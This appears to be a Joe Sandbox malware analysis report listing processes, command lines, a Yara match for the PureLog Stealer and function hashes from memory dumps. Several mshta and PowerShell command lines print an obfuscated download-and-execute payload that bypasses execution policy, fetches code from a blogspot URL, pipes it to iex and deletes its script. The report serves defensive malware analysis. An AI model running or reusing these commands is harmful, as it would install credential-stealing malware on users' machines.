Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:01:18
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Imagebase:	0x730000
File size:	32'768 bytes
MD5 hash:	3A77A4F220612FA55118FB8D7DDAE83C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:01:19
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Imagebase:	0x580000
File size:	32'768 bytes
MD5 hash:	3A77A4F220612FA55118FB8D7DDAE83C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:01:19
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Imagebase:	0x770000
File size:	91'216 bytes
MD5 hash:	84C42D0F2C1AE761BEF884638BC1EACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:01:19
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Imagebase:	0xd20000
File size:	91'216 bytes
MD5 hash:	84C42D0F2C1AE761BEF884638BC1EACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:01:19
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 792
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:01:19
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 788
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	19:01:22
Start date:	25/04/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
Imagebase:	0x7ff6363e0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	19:01:22
Start date:	25/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	19:01:22
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	19:01:31
Start date:	25/04/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	19:01:31
Start date:	25/04/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
Imagebase:	0x7ff6363e0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:01:39
Start date:	25/04/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE "javascript:nd=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);"
Imagebase:	0x7ff6363e0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:01:40
Start date:	25/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7884, Parent PID: 7876

General

Target ID:	24
Start time:	19:01:40
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:01:47
Start date:	25/04/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;','run']; la=[ql[3
Imagebase:	0x7ff6363e0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 017112B8 Relevance: 8.2, Strings: 6, Instructions: 717COMMON

Download Yara Rule

Strings

TJbq, xrefs: 01711335
xb`q, xrefs: 01711316
4']q, xrefs: 01711917
TJbq, xrefs: 017116BC
paq, xrefs: 01711956
Te]q, xrefs: 0171169B

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4']q$TJbq$TJbq$Te]q$paq$xb`q
API String ID: 0-2757515195
Opcode ID: 56de76f0be7a6ec4fab8a403b0945086a9ce1d6d86fc0b22890271d02d3372fb
Instruction ID: b1ea00fa16da6d2ad8991cbc848416cec10cb9130bc42747be41cd58e811044b
Opcode Fuzzy Hash: 56de76f0be7a6ec4fab8a403b0945086a9ce1d6d86fc0b22890271d02d3372fb
Instruction Fuzzy Hash: BA522435A005159FDB19DF68C984E69BBF2FF88304F5981A8E60A9B376CB31EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0171347C Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a1ba386ed0315d1bda2db5cdf86f9580a259778f24ebdf2a6b0a941950d231
Instruction ID: 107e88434b17a6b8dc2b4a8fcad97c48f6721360a636592af456eb6b9dd258fd
Opcode Fuzzy Hash: 33a1ba386ed0315d1bda2db5cdf86f9580a259778f24ebdf2a6b0a941950d231
Instruction Fuzzy Hash: D661BE31A08110CFD7119B2CC408778FAA2BB80731F5989B6D45A9F3DEDB79DC468B56

Uniqueness

Uniqueness Score: -1.00%

Function 01711168 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e619d2e2fd7a416acf9f559bc5a8a16e50a946bd506c44d69b2c7c1f36e3d4
Instruction ID: 54be1ea58c3acef80407ae35d3c9f506a67fd1e1e72b6ddafe3b8f380146cb13
Opcode Fuzzy Hash: 11e619d2e2fd7a416acf9f559bc5a8a16e50a946bd506c44d69b2c7c1f36e3d4
Instruction Fuzzy Hash: 0031F630A05209AFDB15EFB8EC146EFBBBAEB41304F904159D506AB388DE345D098F92

Uniqueness

Uniqueness Score: -1.00%

Function 01710C79 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41729a6f630dfeae2afe64d377a8957ce4cb93c33b6a1fc8b41a03878a5f1ee2
Instruction ID: 28cf9a89a0ed8df5b63842d7a7dbaab2b432bb9bae9e3f0fe58fedbe94ac4652
Opcode Fuzzy Hash: 41729a6f630dfeae2afe64d377a8957ce4cb93c33b6a1fc8b41a03878a5f1ee2
Instruction Fuzzy Hash: 7F31CF709053498FDB06DFB8D9506EEBBB6FF85300F4080AAE141AB266DB345D09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01711D70 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96927786e4e37f23adac21910acb69e3842119da511f0e07e034056459b1d40
Instruction ID: 0412d42d9e28941d8585d9466f25d9df7d5b311a5708b6851aa784108caf237c
Opcode Fuzzy Hash: c96927786e4e37f23adac21910acb69e3842119da511f0e07e034056459b1d40
Instruction Fuzzy Hash: 12212630A042868FCB45EF78DC546AEBB71EB51310F9044A9C5059B249EE349E49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01711D00 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c7c194d98de53ee288f6a5501f42cd7f66fce904a4d5a7b525f1953f600757
Instruction ID: 315442862f1764f1f889091cb84c74a31f2955e86f8cd57f137e16d02e50a5ee
Opcode Fuzzy Hash: c6c7c194d98de53ee288f6a5501f42cd7f66fce904a4d5a7b525f1953f600757
Instruction Fuzzy Hash: CBF0A77194520CAFCB11DFF4C9009CEBFF9EF4A300F9042DA99099B624EA724F009792

Uniqueness

Uniqueness Score: -1.00%

Function 017138F5 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33c3844b8f6eed0ab87bf47c2291e9fad460aa764aa7b3d4a13c13052748f42
Instruction ID: 3a3dfcc1745699ffe835bee6f20b29a4c4b36dc09be7b70922ab18316addb3e5
Opcode Fuzzy Hash: e33c3844b8f6eed0ab87bf47c2291e9fad460aa764aa7b3d4a13c13052748f42
Instruction Fuzzy Hash: 2EE04F2134E5444FC7058B2CCCA5629FB73AF96205B1C84A65A48CB2AFC525CC0BC352

Uniqueness

Uniqueness Score: -1.00%

Function 01710C41 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af150a82faf80f990901930fad28cb2c0d955c757afad049384a78c60361165
Instruction ID: e3494dc1702e2aa40fc6ad46062022e2271afadc966a44f11f331e5ad9abf3c4
Opcode Fuzzy Hash: 0af150a82faf80f990901930fad28cb2c0d955c757afad049384a78c60361165
Instruction Fuzzy Hash: 78D02E30048388AFE3102178CC2A294BB74A702710F008071EA0286295EA91398A9BD2

Uniqueness

Uniqueness Score: -1.00%

Function 01711CA8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c07b1510fb233e37719e030fe27cb2b8e9063ffe63434a0ab20c5797589506f
Instruction ID: 50a3cade73f17680bfe57cff511fd4d67094c377940fd7fd1b4bd67ded503bba
Opcode Fuzzy Hash: 9c07b1510fb233e37719e030fe27cb2b8e9063ffe63434a0ab20c5797589506f
Instruction Fuzzy Hash: BCE08C7194A208AFCB55DFB889404DABBF8AF4A31075142FBD508DB221E6750E049B62

Uniqueness

Uniqueness Score: -1.00%

Function 01710CF3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85eca127cf59aace3664fbc754cf7aeeb230a47892c6dfbed94da4306986edac
Instruction ID: 28880a01210185099c7dd947bbbdb57d01219276ed87dd697ff08eb39e00ac0a
Opcode Fuzzy Hash: 85eca127cf59aace3664fbc754cf7aeeb230a47892c6dfbed94da4306986edac
Instruction Fuzzy Hash: 8CE01A31940209CFCB15DFA8C9A45DEBFB6FB48701F449095E1036A259CB346D89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01713890 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a24f6972641e1dbdeb1ff7fd6a968950c9e8b6532aa5ea812eaa64d4166f2163
Instruction ID: 1c095d51e7815953984d885130c0c708aeb0ebbb30a4b80c75350d929c836d24
Opcode Fuzzy Hash: a24f6972641e1dbdeb1ff7fd6a968950c9e8b6532aa5ea812eaa64d4166f2163
Instruction Fuzzy Hash: 07C04C6230280147D74CDA2CCD57B69F2A2DBDB644F7CD1B86509C7365DA32ED078645

Uniqueness

Uniqueness Score: -1.00%

Function 01711CB8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23243b7b130872a3fe1f047cd04bf181664bbea97967937e49f0a7b85477bbc
Instruction ID: ea178501fd39d4ae513413c65a0221f03c195a616996c69635a717c1768d6242
Opcode Fuzzy Hash: a23243b7b130872a3fe1f047cd04bf181664bbea97967937e49f0a7b85477bbc
Instruction Fuzzy Hash: A3D0C97194510CAF8B00DFE8890089EBBEDEB49200BA046E69508DB614EA725F109B91

Uniqueness

Uniqueness Score: -1.00%

Function 01710C50 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba8c987421090021381c1200d7c65ec7cd2b275f9f84dd3a9fd9b089caf330a
Instruction ID: 5063730c0144b4f6d82d44b4ef0644aa4cc58d916debbf86b0459cb94071ecee
Opcode Fuzzy Hash: 2ba8c987421090021381c1200d7c65ec7cd2b275f9f84dd3a9fd9b089caf330a
Instruction Fuzzy Hash: 1FC08C31404388EBC7007579CC2C66ABB78A748300F408024EA0252259EF6079155ADB

Uniqueness

Uniqueness Score: -1.00%

Function 01711E30 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a1cdd71f938adb334530e6f8db41aa571fb37e0f443188602074fc9043e878
Instruction ID: 9bbba77e91650d2ffa96421e33e1e20c2786c5345d2ed804ba4efde16ab9ecfc
Opcode Fuzzy Hash: 23a1cdd71f938adb334530e6f8db41aa571fb37e0f443188602074fc9043e878
Instruction Fuzzy Hash: 3EC08C338882404FCB0937B8EC18098BB24883422438680A2E50E8B51AD90089018F92

Uniqueness

Uniqueness Score: -1.00%

Function 01711C20 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 01711CF0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 017112A7 Relevance: 5.3, Strings: 4, Instructions: 319COMMON

Download Yara Rule

Strings

TJbq, xrefs: 01711335
xb`q, xrefs: 01711316
TJbq, xrefs: 017116BC
Te]q, xrefs: 0171169B

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID: TJbq$TJbq$Te]q$xb`q
API String ID: 0-3018173371
Opcode ID: 72a39ea275038238df28ad780f607633064324dfc4d0f265a203aaa298a95d7f
Instruction ID: 6e03560535cdd3caad05e63dfbe6b2d2fd4a2669706fef98c7abb0cbabfd09de
Opcode Fuzzy Hash: 72a39ea275038238df28ad780f607633064324dfc4d0f265a203aaa298a95d7f
Instruction Fuzzy Hash: 7AC15471A0061A9FDB18DF7DC984BA9BBF2BF88600F5481A8E509DB365DA30EC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01710E80 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

4']q, xrefs: 01710F59
4']q, xrefs: 01710F2E

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 6ab2de2a0a56e7be272addc55de5e90cc2a88e85453442a4a0fe35ca87ee5a4c
Instruction ID: a7f03aa0f8307e3a7061be8b706e6304e81d53b7d5e44e3683b5df527463c662
Opcode Fuzzy Hash: 6ab2de2a0a56e7be272addc55de5e90cc2a88e85453442a4a0fe35ca87ee5a4c
Instruction Fuzzy Hash: A7612B70A01645CFE708DF7AED4169ABBE7FFC8300B44D529C4099B268DB7969098F91

Uniqueness

Uniqueness Score: -1.00%

Function 01710E90 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4']q, xrefs: 01710F59
4']q, xrefs: 01710F2E

Memory Dump Source

Source File: 00000004.00000002.2217534677.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1710000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 53dfcf1caabab8ddc92fe9164f7a827dd9ff74f95e065d16e52c1934c50f385b
Instruction ID: c91d7e0a36e2353dbca0e444a685cd4a9c837df4987805f9d50ad55b4d25a901
Opcode Fuzzy Hash: 53dfcf1caabab8ddc92fe9164f7a827dd9ff74f95e065d16e52c1934c50f385b
Instruction Fuzzy Hash: 5A511C70A01685CFE708DF7AED5069ABBE7FFC8300B54D529C4099B268DB786909CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 6096, Parent PID: 5012COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00A712B8 Relevance: 8.2, Strings: 6, Instructions: 717
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

paq, xrefs: 00A71956
xb`q, xrefs: 00A71316
4']q, xrefs: 00A71917
TJbq, xrefs: 00A716BC
TJbq, xrefs: 00A71335
Te]q, xrefs: 00A7169B

Memory Dump Source

Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4']q$TJbq$TJbq$Te]q$paq$xb`q
API String ID: 0-2757515195
Opcode ID: f4091b5dadd9f4fac9eb2fbab860cf34f9a3657409d978a59d05743e0dc171b1
Instruction ID: 06aa64a2f2981243a36293a9349eb90787fc4e53967b288490d151003d76c2c0
Opcode Fuzzy Hash: f4091b5dadd9f4fac9eb2fbab860cf34f9a3657409d978a59d05743e0dc171b1
Instruction Fuzzy Hash: A8521275A001149FDB19DF68C984EA9BBF2FF88314F15C1A8E50A9B276DB31EC81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 06771940 Relevance: 2.7, Strings: 2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06771B55
$]q, xrefs: 06771B65

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 44db9f74b58229b034df9243463f31f0292039cc1974ce0ac0a897646082928a
Instruction ID: 7607b040398f793060f9a351080cf756689cf99c699447750716e1b3d0e7880e
Opcode Fuzzy Hash: 44db9f74b58229b034df9243463f31f0292039cc1974ce0ac0a897646082928a
Instruction Fuzzy Hash: 3E910330E08249CFEF54CFA8C450BBEBBB2EB85311F89C176D052AB295E7349945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D3A6B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04D3A727

Memory Dump Source

Source File: 00000005.00000002.3298316044.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4d30000_RegSvcs.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 8dff49e8c11c4632ba244c9eb14cbf7f868a936c87087cb3932c5171f8328c7c
Instruction ID: 45b1996f0016393abf396982842271b4cb4a788d938347f14c1fa2f6a8cc9445
Opcode Fuzzy Hash: 8dff49e8c11c4632ba244c9eb14cbf7f868a936c87087cb3932c5171f8328c7c
Instruction Fuzzy Hash: 392125B19002598FCB10CF9AD484BEEBBF4AF49310F14845AE459A7350D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06771AB0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

$]q, xrefs: 06771B55

Memory Dump Source

Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 7ddfad74a7146714771dd5b0e3bf98aee616afb82416c74f1f3aea8e848b64fe
Instruction ID: dd656a329da77869a738983144ad94443d6301cb0dc569dccab20e3250a4dcd2
Opcode Fuzzy Hash: 7ddfad74a7146714771dd5b0e3bf98aee616afb82416c74f1f3aea8e848b64fe
Instruction Fuzzy Hash: 67418131E04115CFEF54CFA9C440BBAB7B2EB89316F99C276D0529B295E3349984CB91

Uniqueness

Uniqueness Score: -1.00%

